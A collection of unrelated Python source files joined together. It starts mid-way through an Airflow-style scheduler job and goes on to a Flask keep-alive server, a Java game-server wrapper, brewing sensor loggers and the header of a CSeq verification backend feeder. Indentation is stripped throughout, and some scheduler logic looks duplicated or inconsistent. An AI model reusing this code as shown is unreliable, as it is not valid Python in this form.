dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = timezone.utcnow()
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contain all of the task_instances' DAGs
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
path = simple_dag.full_filepath
if path.startswith(settings.DAGS_FOLDER):
path = path.replace(settings.DAGS_FOLDER, "DAGS_FOLDER", 1)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=path,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instances whose state was changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
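# Illustrative behaviour (hypothetical numbers): with max_tis_per_query = 512
# and 1200 executable TIs, reduce_in_chunks() invokes query() three times on
# chunks of 512, 512 and 176 TIs, so each batch is set to QUEUED, enqueued and
# committed independently.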
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs back to the scheduled state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance.queued_dttm = None
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: list[airflow.models.DAG]
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if conf.getboolean('core', 'CHECK_SLAS', fallback=True):
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Running execute loop for %s seconds", self.run_duration)
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
type(self)._create_dag_file_processor,
processor_timeout,
self.dag_ids,
pickle_dags,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(file_path, zombies, dag_ids, pickle_dags):
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessor(file_path,
pickle_dags,
dag_ids,
zombies)
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while (timezone.utcnow() - execute_start_time).total_seconds() < \
self.run_duration or self.run_duration < 0:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if len(simple_dags) > 0:
try:
simple_dag_bag = SimpleDagBag(simple_dags)
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
scheduled_dag_ids = ", ".join(simple_dag_bag.dag_ids)
self.log.info('DAGs to be executed: {}'.format(scheduled_dag_ids))
# TODO(CX-17516): State.QUEUED has been added here which is a hack as the Celery
# Executor does not reliably enqueue tasks with the MySQL broker, and we have
# seen tasks hang after they get queued. The effect of this hack is queued tasks
# will constantly be requeued and resent to the executor (Celery).
# This should be removed when we switch away from the MySQL Celery backend.
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED, State.QUEUED))
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
continue
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.log.info("Terminating DAG processors")
self.processor_agent.terminate()
self.log.info("All DAG processors terminated")
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the DAGs found in the file,
    together with the number of import errors
:rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = models.DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "BOT IS ONLINE <br> SOURCE CODE BY https://github.com/staciax"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
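# Hedged usage sketch (not part of the original file): keep_alive() is meant to
# be imported by a long-running script, typically a Discord bot, so the small
# Flask server keeps the hosting platform from idling the process. The loop
# below is only a stand-in for that long-running work.
if __name__ == "__main__":
    import time
    keep_alive()        # serves "/" on 0.0.0.0:8080 from a background thread
    while True:
        time.sleep(60)  # placeholder for the bot's own event loop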
|
wrapper.py
|
import os
import subprocess
import sys
from threading import Thread
from queue import Queue, Empty
# https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
class server:
def __init__(self, server_dir=os.path.join(os.getcwd(), "server")):
self.server_dir = server_dir
self.queue = Queue()
self.thread = Thread()
self.ON_POSIX = 'posix' in sys.builtin_module_names
self.server_output = []
def _queue(self, stdout, queue):
for line in iter(stdout.readline, ''):  # text-mode pipe: EOF yields '' rather than b''
queue.put(line)
self.server_output.append(line.replace("\n", ""))
stdout.close()
def start(self, wait_for_server=True, nogui=False):
startup_cmd = "java -jar spinel_server.jar"
if nogui:
startup_cmd += " --nogui"
self.pipe = subprocess.Popen(startup_cmd, cwd=self.server_dir, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True, text=True, bufsize=1, close_fds=self.ON_POSIX)
self.thread = Thread(target=self._queue, args=(self.pipe.stdout, self.queue))
self.thread.daemon = True
self.thread.start()
if wait_for_server:
server_up = False
# Wait for the server to startup by checking for the "help" message
while not server_up:
for line in self.server_output:
if "For help, type \"help\"" in line:
server_up = True
def latest_message(self):
try:
return message(self.queue.get_nowait().replace("\n", ""))
except Empty:
pass
def write(self, msg):
self.pipe.stdin.write(msg + "\n")
class message:
def __init__(self, message):
self.raw = message
self.author = ""
self.content = ""
try:
# checks if the message has a valid author (prevents things like commands from registering as chat)
if message.split(" ")[3].startswith("<") and message.split(" ")[3].endswith(">"):
self.content = message.split(" ")[4:]
self.content = " ".join(self.content)
self.author = message.split(" ")[3].replace(">", "").replace("<", "")
except IndexError:
pass
def __str__(self):
return self.raw
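# Hedged usage sketch (not part of the original file): everything below assumes
# a ./server directory containing spinel_server.jar, as expected by
# server.start(); only the classes defined above are used.
if __name__ == "__main__":
    import time
    srv = server()
    srv.start(wait_for_server=True, nogui=True)
    srv.write("say hello from wrapper.py")
    while True:
        msg = srv.latest_message()
        if msg is not None and msg.author:
            # e.g. a line like "[12:00:01] [Server thread/INFO]: <steve> hi"
            # parses to author "steve" and content "hi"
            print("{}: {}".format(msg.author, msg.content))
        time.sleep(0.1)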
|
brewSensor.py
|
import bme680
import adafruit_dht
import board
import threading
import time
from logger import logger
class BrewSensor():
def __init__(self, location, interval=2):
self.location = location
self.interval = interval
@staticmethod
def getSensorByItsLocation(sensors, location):
return next(( sensor for sensor in sensors if sensor.location == location), None)
class DHT11Sensor(BrewSensor):
def __init__(self, pin, location, interval):
super().__init__(location, interval)
self.pin = pin
self.sensor = adafruit_dht.DHT11(board.D17)  # note: hardcoded to board pin D17; the pin argument above is not used
@property
def temp(self):
try:
return self.sensor.temperature
except RuntimeError as error:
timeout = 2
telemetry = {
'location': self.location,
'error': str(error),
'exception': error.__class__.__name__
}
logger.error('DHT sensor got invalid checksum, trying again in {} seconds.'.format(timeout), es=telemetry)
time.sleep(timeout)
return self.temp
@property
def humidity(self):
return self.sensor.humidity
def logReadings(self):
telemetry = {
'temperature': self.temp,
'humidity': self.humidity,
'location': self.location
}
logger.info("Sensor readings", es=telemetry)
return
def spawnBackgroundSensorLog(self):
thread = threading.Thread(target=self.logSensorOnIntervalForever, args=())
thread.daemon = True
thread.start()
logger.info("spawned background sensor {} log at interval: {}".format(self.location, self.interval))
def logSensorOnIntervalForever(self):
while True:
try:
self.logReadings()
except Exception as error:
logger.error('Sensor log daemon failed, sleeping and trying again', es={
'location': self.location,
'error': str(error),
'exception': error.__class__.__name__
})
time.sleep(2)
time.sleep(self.interval)
@staticmethod
def fromYaml(loader, node):
return DHT11Sensor(**loader.construct_mapping(node))
class BME680Sensor(BrewSensor):
def __init__(self, location, interval):
super().__init__(location, interval)
self.setupSensors()
self.lastSensorRead = time.time()
def setupSensors(self):
try:
self.sensor = bme680.BME680()
self.sensor.set_humidity_oversample(bme680.OS_2X)
self.sensor.set_pressure_oversample(bme680.OS_4X)
self.sensor.set_temperature_oversample(bme680.OS_8X)
self.sensor.set_filter(bme680.FILTER_SIZE_3)
self.sensor.set_gas_status(bme680.ENABLE_GAS_MEAS)
self.sensor.set_gas_heater_temperature(320)
self.sensor.set_gas_heater_duration(150)
self.sensor.select_gas_heater_profile(0)
except RuntimeError as error:
logger.error('Sensor not found!', es={
'location': self.location,
'error': str(error),
'exception': error.__class__.__name__
})
def read(self):
self.lastSensorRead = time.time()
return self.sensor.get_sensor_data()
def logReadings(self, detailed):
if self.needToUpdateReadings:
self.read()
telemetry = {
'temperature': self.temp,
'pressure': self.pressure,
'humidity': self.humidity,
'location': self.location
}
if detailed:
telemetry['gasResistance'] = self.gasResistance
telemetry['stableHeat'] = self.stableHeat
logger.info("Sensor readings", es=telemetry)
return
def saveToFile(self, filename):
with open(filename, "w") as file:
file.write("{}".format(self.temp))
def spawnBackgroundSensorLog(self):
thread = threading.Thread(target=self.logSensorOnIntervalForever, args=())
thread.daemon = True
thread.start()
logger.info("spawned background sensor {} log at interval: {}".format(self.location, self.interval))
def logSensorOnIntervalForever(self):
while True:
try:
self.logReadings(detailed=True)
except Exception as error:
logger.error('Sensor log daemon failed, sleeping and trying again', es={
'location': self.location,
'error': str(error),
'exception': error.__class__.__name__
})
time.sleep(2)
time.sleep(self.interval)
@property
def needToUpdateReadings(self):
return time.time() - self.lastSensorRead > 1
@property
def temp(self):
if self.needToUpdateReadings:
self.read()
return self.sensor.data.temperature
@property
def pressure(self):
if self.needToUpdateReadings:
self.read()
return self.sensor.data.pressure
@property
def humidity(self):
if self.needToUpdateReadings:
self.read()
return self.sensor.data.humidity
@property
def gasResistance(self):
if self.needToUpdateReadings:
self.read()
return self.sensor.data.gas_resistance
@property
def stableHeat(self):
if self.needToUpdateReadings:
self.read()
return self.sensor.data.heat_stable
@staticmethod
def fromYaml(loader, node):
return BME680Sensor(**loader.construct_mapping(node))
def __repr__(self):
return "{0:.2f} C,{1:.2f} hPa,{2:.2f} %RH".format(self.temp, self.pressure, self.humidity)
if __name__ == '__main__':
# brewSensor = DHT11Sensor(13, 'outside', 30)
brewSensor = BME680Sensor('inside', 2)
while True:
print(brewSensor.temp)
time.sleep(1)
|
labs_feeder_parallel.py
|
""" CSeq C Sequentialization Framework
parallel backend feeder module:
spawns multiple processes to invoke the backend using different options
written by Omar Inverso.
"""
VERSION = 'labs-feeder_parallel-2018.10.23'
# VERSION = 'labs-feeder_parallel-2018.05.31'
#VERSION = 'feeder_parallel-2018.05.25'
#VERSION = 'feeder_parallel-2018.04.22'
#VERSION = 'feeder-2015.07.16' # CSeq 1.0 Release - ASE2015
"""
Prerequisites:
Input correctly instrumented for the specified backend.
TODO:
- handle keyboard interrupts silently
- when the backend is not available, there should be an exception.
Changelog:
2018.05.31 forked from feeder_parallel for sequentialised programs (feeder_parallel-2018.05.25)
"""
import os, sys, getopt, time, signal, subprocess, shlex
from collections import Counter
#from multiprocessing import Process, Lock, Array
import multiprocessing
import pycparser.c_parser, pycparser.c_ast, pycparser.c_generator
import core.module, core.parser, core.utils
from core.module import ModuleError
from utils import findpropositionalvar, findpropositionalvarsize, get_bin
'''
Options and Parameters below.
'''
# Name of the executable file to run, by backend.
backendFilename = {}
backendFilename['esbmc'] = 'esbmc'
backendFilename['cbmc-assumptions'] = '../cbmc/cbmc-simulator'
backendFilename['llbmc'] = 'llbmc'
backendFilename['blitz'] = 'blitz'
backendFilename['satabs'] = 'satabs'
# backendFilename['2ls'] = 'summarizer'
# backendFilename['smack'] = 'smack-verify.py'
backendFilename['klee'] = 'klee'
backendFilename['cpachecker'] = 'cpa.sh'
# backendFilename['spin'] = 'spin'
# Command-line parameters, by backend.
cmdoptions = {}
cmdoptions['esbmc'] = ' --no-slice --no-bounds-check --no-div-by-zero-check --no-pointer-check --unwind 1 --no-unwinding-assertions '
cmdoptions['cbmc-assumptions'] = ' ' ###cmdoptions['cbmc'] = ' --bounds-check '
###cmdoptions['cbmc'] = ' --unwind 1 --no-unwinding-assertions '
cmdoptions['llbmc'] = ' -no-max-function-call-depth-checks -no-memory-free-checks -no-shift-checks -no-memcpy-disjoint-checks -no-memory-access-checks -no-memory-allocation-checks --max-loop-iterations=1 --no-max-loop-iterations-checks --ignore-missing-function-bodies -no-overflow-checks -no-div-by-zero-checks'
cmdoptions['blitz'] = ' --terminate-on-firstbug '
cmdoptions['satabs'] = ' '
# cmdoptions['2ls'] = ' '
# cmdoptions['smack'] = ' --unroll 1 '
cmdoptions['klee'] = ' -exit-on-error '
cmdoptions['cpachecker'] = ' -preprocess -heap 15000M -timelimit 86400 -noout -predicateAnalysis '
# Command-line parameters, by backend - when no sequentialisation is performed.
cmdoptionsNOSEQ = {}
cmdoptionsNOSEQ['esbmc'] = ' --no-slice --no-bounds-check --no-div-by-zero-check --no-pointer-check '
cmdoptionsNOSEQ['cbmc-assumptions'] = ' '
cmdoptionsNOSEQ['llbmc'] = ' -no-max-function-call-depth-checks -no-memory-free-checks -no-shift-checks -no-memcpy-disjoint-checks -no-memory-access-checks -no-memory-allocation-checks --ignore-missing-function-bodies -no-overflow-checks -no-div-by-zero-checks '
# cmdoptionsNOSEQ['blitz'] = ' --terminate-on-firstbug ' # No support concurrency
cmdoptionsNOSEQ['satabs'] = ' '
# cmdoptionsNOSEQ['2ls'] = ' ' # no concurrency support
# cmdoptionsNOSEQ['smack'] = ' '
cmdoptionsNOSEQ['klee'] = ' '
# cmdoptionsNOSEQ['cpachecker'] = ' -preprocess -heap 15000M -timelimit 86400 -noout -predicateAnalysis ' # No support concurrency
class labs_feeder_parallel(core.module.BasicModule):
verbose = False
def init(self):
self.addInputParam('backend', 'backend (blitz, cbmc, esbmc, llbmc, cpachecker, satabs, klee)', 'b', 'cbmc-assumptions', False)
self.addInputParam('time', 'analysis time limit (in seconds)', 't', '3600000', False)
self.addInputParam('depth', 'limit search depth', 'd', '0', False) # depth parameter for the competition
self.addInputParam('extrargs', 'extra arguments to use for parallel analysis (one per core)', 'x', [], False)
self.addInputParam('simulate', '0 for verification mode; otherwise # of traces to generate', 't', '0', optional=True) # TODO
self.addInputParam('info', 'LAbS system information', 'i', None, False)
self.addOutputParam('exitcode')
def loadfromstring(self, string, env):
extrargs = []
simulate = 0
cores = None
if self.getInputParamValue('extrargs') is not None:
extrargs = self.getInputParamValue('extrargs')
cores = len(extrargs)
if cores == 0 or cores is None: cores = 1
if self.getInputParamValue('show') is not None:
self.output = string
return
if self.getInputParamValue('simulate') is not None:
simulate = int(self.getInputParamValue('simulate'))
if simulate:
cores = 16
if cores > 1: print("Parallel analysis using %s cores" % cores)
